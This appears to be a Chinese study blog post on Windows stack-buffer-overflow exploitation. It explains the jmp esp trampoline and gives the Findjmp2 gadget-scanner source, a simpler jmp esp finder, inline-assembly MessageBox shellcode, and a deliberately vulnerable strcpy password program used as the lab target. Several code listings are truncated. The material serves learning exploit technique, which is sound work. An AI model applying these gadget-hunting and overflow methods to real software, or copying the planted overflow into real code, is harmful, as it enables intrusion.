OD: Shellcode / Exploit & DLL Trampolining


标题中 Dll Tramplining(跳板)名字是从如下地址找到的,写的很好:



原来,shellcode 这个词来源于一篇论文:1996 年 Aleph One 发表跨时代的《Smathing The Stack For Fun And Profit》,文中描述讲到利用基于栈的溢出向进程中植入一段用于获得 shell 的代码,并将植入的代码称为 Shellcode。后来 shellcode 被统一指代通过缓冲区溢出植入的代码。

exploit 是一个过程,其结果通常体现为一段代码,这段代码承载了 shellcode。exploit 用于生成攻击性的网络数据包或者其他形式的攻击性输入,其核心是淹没返回地址,劫持进程控制权,之后跳转执行 shellcode。

shellcode 有通用性,而 exploit 往往针对特定漏洞。如果说 exploit 是导弹,shellcode 则可以比喻成弹头。Metasploit 就充分利用了模块化和代码复用的思想,将 exploit 和 payload (shellcode) 分开。

Shellcode 需要解决的问题

1. 自动定位 shellcode 的起点。实际使用中,shellcode 经常被动态加载(特别是 IE)。

2. 填充数据的设计。(想到《The Art Of Exploitation》中提到过好多技巧,可惜细节忘差不多了)

3. 动态获取系统的 API 地址。

4. 对 shellcode 进行编码解码,突破 buffer 和 IDS 的限制。(又想到《TAOE》)

动态定位 Shellcode — 跳板原理

实际 exploit 过程中,由于 dll 的装入和卸载等原因,Windows 进程的函数栈帧经常会移位,如此一来,将返回地址设置成定值的方法就不通用。

1998 年,黑客组织“Cult of the Dead Cow”的 Dildog 在 Bugtrq 邮件列表中以 Microsoft Netmeeting 为例首次提出了利用 jmp esp 完成对 shellcode 的动态定位,从而解决了 Windows 下栈帧移位问题给开发稳定 exploit 带来的重重困难。毫不夸张地讲,跳板技术是 Windows 栈溢出利用技术的一个里程碑。

注意到在一般情况下,ESP 中的地址问题指向系统栈中,且不会被溢出的数据破坏。函数返回时,ESP 所指的位置通常在返回地址的下一个位置,这就为跳板技术的实施开了条路。(需要注意,函数返回时 ESP 所指的位置与函数调用约定、返回指令有关,例如“retn 3”、“retn 4”之后,ESP 所指的位置是会有偏差)

如上图,使用 jmp esp 跳板动态定位的方法为:

1. 用内存中任意一条 jmp esp 指令的地址覆盖返回地址,而不用上一篇中手工查出的 shellcode 的起始地址。

2. 函数返回地去执行 jmp esp(跳板),而不直接执行 shellcode。

3. 将 shellcode 放置在返回地址之后,这样 jmp esp 之后执行的就是 shellcode。

这样一来,不管栈帧如何移位,shellcode 都能被动态地准确定位到。



  1 /*
  2    Findjmp.c
  3    written by Ryan Permeh - ryan at eeye - Summarily modified by I2S-LaB.com
  4 http://www.eeye.com
  6 Findjmp2.c (pop/pop/ret scanner, logging to file)
  7 version by A.D - class101 at hat-squad
  8 http://class101.org, http://www.hat-squad.com
 11 This finds useful jump points in a dll. Once you overflow a buffer, by
 12 looking in the various registers, it is likely that you will find a
 13 reference to your code. This program will find addresses suitible to
 14 overwrite eip that will return to your code.
 16 It should be easy to modify this to search for other good jump points,
 17 or specific code patterns within a dll.
 19 It currently supports looking for:
 20 1. jmp reg
 22 2. call reg
 24 3. push reg
 25 ret
 26 All three options result in the same thing, EIP being set to reg.
 28 It also supports the following registers:
 29 EAX
 30 EBX
 31 ECX
 32 EDX
 33 ESI
 34 EDI
 35 ESP
 36 EBP
 37 */
 39 #include <iostream.h>
 40 #include <fstream.h>
 41 #include <Windows.h>
 42 #include <stdio.h>
 44 FILE *fplog;
 46 void usage();
 47 void sep();
 48 void iok(BYTE *curpos, char *reg);
 49 void iok2(BYTE *curpos, char *reg);
 50 void ook(BYTE *curpos, char *reg);
 51 void ook2(BYTE *curpos, char *reg);
 53 DWORD GetRegNum( char *reg );
 54 void findjmp( char *dll, char *reg );
 56 //This finds useful jump points in a dll. Once you overflow a buffer, by
 57 //looking in the various registers, it is likely that you will find a
 58 //reference to your code. This program will find addresses of suitible
 59 //addresses of eip that will return to your code.
 61 int main( int argc, char **argv )
 62 {
 63     if( argc <= 2 )
 64         usage();
 66     else
 67     {
 68         char dll[512], //holder for the dll to look in
 69              reg[512]; // holder for the register
 71         if ((fplog =fopen("findjmp.txt","r"))==NULL){
 72             fplog =fopen("findjmp.txt","w");}
 73         else fplog =fopen("findjmp.txt","a");
 74         strncpy( dll, argv[1], 512 );
 75         strncpy( reg, argv[2], 512 );
 76         findjmp( dll, reg );
 77     }
 78     return 0;
 79 }
 81 //This prints the usage information.
 83 void usage()
 84 {
 85     printf("
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
FindJmp DLL registre
Ex: findjmp KERNEL32.DLL esp"
 86             "
Currently supported registre are: EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP
" );
 87 }
 89 //findjmp is the workhorse. it loads the requested dll, and searches for
 90 //the specific patterns for jmp reg, push reg ret, and call reg
 92 void findjmp( char *dll,char *reg )
 93 {
 94     char reg1[]="eax";char reg2[]="ebx";
 95     char reg3[]="ecx";char reg4[]="edx";
 96     char reg5[]="esi";char reg6[]="edi";
 97     char reg7[]="esp";char reg8[]="ebp";
 99     BYTE jmppat[8][2]={ { 0xFF, 0xE0 }, { 0xFF, 0xE3 }, { 0xFF, 0xE1 }, { 0xFF, 0xE2 },
100         { 0xFF, 0xE6 }, { 0xFF, 0xE7 }, { 0xFF, 0xE4 }, { 0xFF, 0xE5 } }; // patterns for jmp ops
102     BYTE callpat[8][2]={ { 0xFF, 0xD0 }, { 0xFF, 0xD3 }, { 0xFF, 0xD1 }, { 0xFF, 0xD2},
103         { 0xFF, 0xD6 }, { 0xFF, 0xD7 }, { 0xFF, 0xD4 }, { 0xFF, 0xD5 } }; // patterns for call ops
105     BYTE pushretpat[8][2]={ { 0x50, 0xC3 }, { 0x53, 0xC3 }, { 0x51, 0xC3 }, { 0x52, 0xC3 },
106         { 0x56, 0xC3 }, { 0x57, 0xC3 }, { 0x54, 0xC3 }, { 0x55, 0xC3 } }; // patterns for pushret ops
108     BYTE poppat[8][1]={ { 0x58 }, { 0x5B }, { 0x59 }, { 0x5A }, // patterns for pop,pop,ret
109         { 0x5E }, { 0x5F }, { 0x5C }, { 0x5D },};
111     BYTE retn[1][1]={ 0xC3 }; // pattern for pop,pop,ret
113     BYTE retnbis[1][1]={ 0xC2 }; // pattern for pop,pop,ret
116     HMODULE loadedDLL; //base pointer for the loaded DLL
118     BYTE *curpos; //current position within the DLL
119     BYTE *curpos2; //subposition pop,pop,ret
121     DWORD regnum=GetRegNum(reg); // decimal representation of passed register
122     DWORD regnum1=GetRegNum(reg1);DWORD regnum2=GetRegNum(reg2);
123     DWORD regnum3=GetRegNum(reg3);DWORD regnum4=GetRegNum(reg4);
124     DWORD regnum5=GetRegNum(reg5);DWORD regnum6=GetRegNum(reg6);
125     DWORD regnum7=GetRegNum(reg7);DWORD regnum8=GetRegNum(reg8);
127     DWORD numaddr=0; //accumulator for addresses
129     if( regnum == -1 ) //check if register is useable
130     { //it didn't load, time to bail
131         printf( "There was a problem understanding the register.
132                 "Please check that it isa correct IA32 register name
133                 "Currently supported are:
134                 "EAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP
135               );
137         exit(-1);
138     }
140     if( (loadedDLL=LoadLibraryA(dll)) == NULL) // check if DLL loaded correctly
141     { //it didn't load, time to bail
142         printf( "There was a problem Loading the requested DLL.
143                 "Please check that it is in your path and readable
" );
144         exit(-1);
145     }
146     else
147     {
148         sep();
149         fprintf(fplog,"Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
150         printf("
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
151         printf( "Scanning %s for code useable with the %s register
", dll, reg ); //we loaded the dll correctly, time to scan it
152         fprintf(fplog,"Scanning %s for code useable with the %s register
", dll, reg ); //we loaded the dll correctly, time to scan it
153         sep();
154         curpos=(BYTE*)loadedDLL; //set curpos at start of DLL
155         curpos2=(BYTE*)loadedDLL; //pop,pop,ret subscan.
157         __try
158         {
159             while(1)
160             {
161                 Sleep(1/10);
162                 if( !memcmp( curpos, jmppat[regnum], 2) ) //check for jmp match
163                 {
164                     printf( "0x%X	jmp %s
", curpos, reg ); // we have a jmp match
165                     fprintf(fplog,"0x%X	jmp %s
", curpos, reg ); // we have a jmp match
166                     numaddr++;
167                 }
168                 else if( !memcmp( curpos, callpat[regnum],2) ) //check for call match
170                 {
171                     printf( "0x%X	call %s
", curpos, reg ); // we have a call match
172                     fprintf(fplog,"0x%X	call %s
", curpos, reg );
173                     numaddr++;
174                 }
175                 else if( !memcmp(curpos,pushretpat[regnum], 2) ) //check for push/ret match
176                 {
177                     printf( "0x%X	push %s - ret
", curpos, reg ); // we have a pushret match
178                     fprintf(fplog,"0x%X	push %s - ret
", curpos, reg ); // we have a jmp match
179                     numaddr++;
180                 }
181                 else if( !memcmp(curpos,poppat[regnum], 1) ) //check for pop/pop/ret match
182                 {
183                     curpos2++;
184                     if( !memcmp(curpos2,poppat[regnum1], 1) )
185                     {
186                         curpos2++;
187                         if( !memcmp(curpos2,retn, 1) )
188                         {
189                             iok(curpos, reg); // we have a popopret match
190                             ook(curpos, reg); // we have a popopret match
191                             numaddr++;
192                         }
193                         if( !memcmp(curpos2,retnbis, 1) )
194                         {
195                             iok2(curpos, reg); // we have a popopret match
196                             ook2(curpos, reg); // we have a popopret match
197                             numaddr++;
198                         }
199                         curpos2--;curpos2--;goto loop;
200                     }
201                     if( !memcmp(curpos2,poppat[regnum2], 1) )
202                     {
203                         curpos2++;
204                         if( !memcmp(curpos2,retn, 1) )
205                         {
206                             iok(curpos, reg); // we have a popopret match
207                             ook(curpos, reg); // we have a popopret match
208                             numaddr++;
209                         }
210                         if( !memcmp(curpos2,retnbis, 1) )
211                         {
212                             iok2(curpos, reg); // we have a popopret match
213                             ook2(curpos, reg); // we have a popopret match
214                             numaddr++;
215                         }
216                         curpos2--;curpos2--;goto loop;
217                     }
218                     if( !memcmp(curpos2,poppat[regnum3], 1) )
219                     {
220                         curpos2++;
221                         if( !memcmp(curpos2,retn, 1) )
222                         {
223                             iok(curpos, reg); // we have a popopret match
224                             ook(curpos, reg); // we have a popopret match
225                             numaddr++;
226                         }
227                         if( !memcmp(curpos2,retnbis, 1) )
228                         {
229                             iok2(curpos, reg); // we have a popopret match
230                             ook2(curpos, reg); // we have a popopret match
231                             numaddr++;
232                         }
233                         curpos2--;curpos2--;goto loop;
234                     }
235                     if( !memcmp(curpos2,poppat[regnum4], 1) )
236                     {
237                         curpos2++;
238                         if( !memcmp(curpos2,retn, 1) )
239                         {
240                             iok(curpos, reg); // we have a popopret match
241                             ook(curpos, reg); // we have a popopret match
242                             numaddr++;
243                         }
244                         if( !memcmp(curpos2,retnbis, 1) )
245                         {
246                             iok2(curpos, reg); // we have a popopret match
247                             ook2(curpos, reg); // we have a popopret match
248                             numaddr++;
249                         }
250                         curpos2--;curpos2--;goto loop;
251                     }
252                     if( !memcmp(curpos2,poppat[regnum5], 1) )
253                     {
254                         curpos2++;
255                         if( !memcmp(curpos2,retn, 1) )
256                         {
257                             iok(curpos, reg); // we have a popopret match
258                             ook(curpos, reg); // we have a popopret match
259                             numaddr++;
260                         }
261                         if( !memcmp(curpos2,retnbis, 1) )
262                         {
263                             iok2(curpos, reg); // we have a popopret match
264                             ook2(curpos, reg); // we have a popopret match
265                             numaddr++;
266                         }
267                         curpos2--;curpos2--;goto loop;
268                     }
269                     if( !memcmp(curpos2,poppat[regnum6], 1) )
270                     {
271                         curpos2++;
272                         if( !memcmp(curpos2,retn, 1) )
273                         {
274                             iok(curpos, reg); // we have a popopret match
275                             ook(curpos, reg); // we have a popopret match
276                             numaddr++;
277                         }
278                         if( !memcmp(curpos2,retnbis, 1) )
279                         {
280                             iok2(curpos, reg); // we have a popopret match
281                             ook2(curpos, reg); // we have a popopret match
282                             numaddr++;
283                         }
284                         curpos2--;curpos2--;goto loop;
285                     }
286                     if( !memcmp(curpos2,poppat[regnum7], 1) )
287                     {
288                         curpos2++;
289                         if( !memcmp(curpos2,retn, 1) )
290                         {
291                             iok(curpos, reg); // we have a popopret match
292                             ook(curpos, reg); // we have a popopret match
293                             numaddr++;
294                         }
295                         if( !memcmp(curpos2,retnbis, 1) )
296                         {
297                             iok2(curpos, reg); // we have a popopret match
298                             ook2(curpos, reg); // we have a popopret match
299                             numaddr++;
300                         }
301                         curpos2--;curpos2--;goto loop;
302                     }
303                     if( !memcmp(curpos2,poppat[regnum8], 1) )
304                     {
305                         curpos2++;
306                         if( !memcmp(curpos2,retn, 1) )
307                         {
308                             iok(curpos, reg); // we have a popopret match
309                             ook(curpos, reg); // we have a popopret match
310                             numaddr++;
311                         }
312                         if( !memcmp(curpos2,retnbis, 1) )
313                         {
314                             iok2(curpos, reg); // we have a popopret match
315                             ook2(curpos, reg); // we have a popopret match
316                             numaddr++;
317                         }
318                         curpos2--;curpos2--;goto loop;
319                     }
320                     curpos2--;
321                 }
322 loop:
323                 curpos++;
324                 curpos2++;
325             }
326         }
327         __except(1)
328         {
329             sep();
330             fprintf( fplog,"Finished Scanning %s for code useable with the %s register
", dll, reg );
331             printf( "Finished Scanning %s for code useable with the %s register
", dll, reg );
332             printf( "Found %d usable addresses
", numaddr );
333             fprintf( fplog,"Found %d usable addresses
", numaddr );sep();fprintf( fplog,"

334         }
335     }
337 }
340 DWORD GetRegNum( char *reg )
341 {
342     DWORD ret=-1;
343     if( !stricmp( reg, "eax") )
344     {
345         ret=0;
346     }
347     else if( !stricmp( reg, "ebx") )
348     {
349         ret=1;
350     }
351     else if( !stricmp( reg, "ecx") )
352     {
353         ret=2;
354     }
355     else if( !stricmp( reg, "edx") )
356     {
357         ret=3;
358     }
359     else if( !stricmp( reg, "esi") )
360     {
361         ret=4;
362     }
363     else if( !stricmp( reg, "edi") )
364     {
365         ret=5;
366     }
367     else if( !stricmp( reg, "esp") )
368     {
369         ret=6;
370     }
371     else if( !stricmp( reg, "ebp") )
372     {
373         ret=7;
374     }
376     return ret; //return our decimal register number
377 }
379 void sep()
380 {
381     fprintf(fplog,"----------------------------------------------------------------------------
382 }
384 void iok(BYTE *curpos, char *reg)
385 {
386     printf( "0x%X	pop %s - pop - ret
", curpos, reg ); // we have a popopret match
387 }
389 void iok2(BYTE *curpos, char *reg)
390 {
391     printf( "0x%X	pop %s - pop - retbis
", curpos, reg ); // we have a popopret match
392 }
394 void ook(BYTE *curpos, char *reg)
395 {
396     fprintf(fplog,"0x%X	pop %s - pop - ret
", curpos, reg ); // we have a jmp match
397 }
399 void ook2(BYTE *curpos, char *reg)
400 {
401     fprintf(fplog,"0x%X	pop %s - pop - retbis
", curpos, reg ); // we have a jmp match
402 }
View Code


 1 #include <windows.h>
 2 #include <stdio.h>
 4 #define DLL_NAME "user32.dll"
 6 int main()
 7 {
 8     BYTE *ptr;
 9     int position, address;
10     HINSTANCE handle;
11     BOOL done_flag = FALSE;
12     handle = LoadLibrary(DLL_NAME);
13     if(!handle)
14     {
15         printf("load dll error!
16         exit(0);
17     }
18     ptr = (BYTE*)handle;
19     for(position=0; !done_flag; position++)
20     {
21         __try
22         {
23             if(ptr[position]==0xFF && ptr[position+1]==0xE4)
24             {
25                 //0xFFE4 : jmp esp
26                 int address = (int)ptr+position;
27                 printf("OPCODE 0xFFE4(jmp esp) found at 0x%x
28             }
29         }
30         __except(1)
31         {
32             int address=(int)ptr+position;
33             printf("End Of 0x%x
34             done_flag=TRUE;
35         }
36     }
37     return 0;
38 }
View Code

更方便的方法是在 OllyDbg 中添加插件 OllyUni.dll,可以查找 Unicode / ASCII 调用地址,使用方法为:打开调试后 [右键-Overflow Return Address] 并选择相应功能执行,执行完结后点击工具栏的 L (Log) 就可以看到结果。


1. 根据获取跳板中的方法,溢出中使用如下地址:0x75DE01BB  -->  jmp esp

2. 编写 shellcode。我使用原书中的方法,利用 Dependency Walker 得到的 MessageBoxA() 和 exit()/ExitProcess() 的地址和实际的都不一样,无奈写了代码动态找出这两个函数的地址,代码使用了函数指针(其实可以直接输出函数地址的,代码中有体现):

 1 #include<stdio.h>
 2 #include<stdlib.h>
 3 #include<string.h>
 4 #include<windows.h>
 6 typedef void(*pf)(int i);
 8 int main()
 9 {
10     pf pfun=exit;
11     printf("exit() @ 0x%08x
",pfun); // 函数指针 结果为 0x00401340 输出结果不定!
12     LoadLibrary("user32.dll");
13     printf("MessageBoxA() @ 0x%08x
",MessageBoxA); // user32.dll 直接输出 结果为 0x772BEA11
14     printf("ExitProcess() @ 0x%08x
",ExitProcess); // kernel32.dll 直接输出 结果为 0x75D7BC9A
15     return 0;
16 }

用 C 写的 shellcode 原代码如下:

 1 #include<stdio.h>
 2 #include<stdlib.h>
 3 #include<string.h>
 4 #include<windows.h>
 6 int main()
 7 {
 8     int exit_addr=exit;
 9     HINSTANCE LibHandle;
10     LibHandle=LoadLibrary("user32.dll");
11     printf("exit() @ 0x%08x
12     _asm{
13         sub sp,0x440
14         xor ebx,ebx
15         push ebx // string ending
16         push 0x74736577
17         push 0x6c696166 // "failwest"
18         mov eax,esp
19         push ebx
20         push eax
21         push eax
22         push ebx
23         mov eax,0x772BEA11
24         call eax // call MessageBoxA()
25         push ebx
26         mov eax,0x75D7BC9A
27         call eax // call ExitProcess(), 不能用 exit() 因为地址中有 0x00,注意下图 OllyDbg 中没有改过来,用的 exit()
28     }
29     return 0;
30 }

编译如上的代码,使用 OllyDbg 调试,找到相应的 shellcode 机器码并 dump 出来:

最后得出的 shellcode 如下:

0xFF 是任意填充,接着的 0x75DE01BB 是 jmp esp 的地址,接着是 shellcode


这样能够 exploit 如下的代码并安全返回:

 1 #include<stdio.h>
 2 #include<stdlib.h>
 3 #include<string.h>
 4 #include<windows.h>
 6 #define PASSWORD "1234567"
 8 int verify_password(char *password)
 9 {
10     int authenticated=0x03050709;
11     char buffer[44];     // add local buf to be overflowed
12     authenticated=strcmp(password,PASSWORD);
13     strcpy(buffer, password);  // overflow here
14     return authenticated;
15 }
17 int main()
18 {
19     int valid_flag=0;
20     char password[1024];
21     //LoadLibrary("c:\windows\system32\user32.dll"); // for messagebox
22     LoadLibrary("user32.dll"); // for messagebox
23     //MessageBoxA(0,"LoadLibrary user32.dll seccess.","Message",0);
24     if(!freopen("password.txt","r",stdin))
25     //FILE *fp;
26     //if(!(fp=fopen("password.txt","rw+")))
27     {
28         printf("file open error!
29         exit(0);
30     }
31     scanf("%s",password);
32     //fscanf(fp,"%s",password);
33     printf("password input: %s
34     valid_flag=verify_password(password);
35     if(valid_flag){
36         printf("Incorrect password!

37     }
38     else
39     {
40         printf("Congratulation! You have passed the verification!

41     }
42     //fclose(fp);
43     return 0;
44 }
View Code


1. 输出 exit() 的地址不定,一直变动,不知道为什么。

2. exit() 地址中含有的 0x00 还是不知道怎么输入 buffer

3. find esp 找到的 jmp esp 的地址不是通用的,怎么解决?

4. Denpendency Walker 算出的 MessageBoxA() 和 ExitProcess() 的地址和实际的还是不一样,不明白。
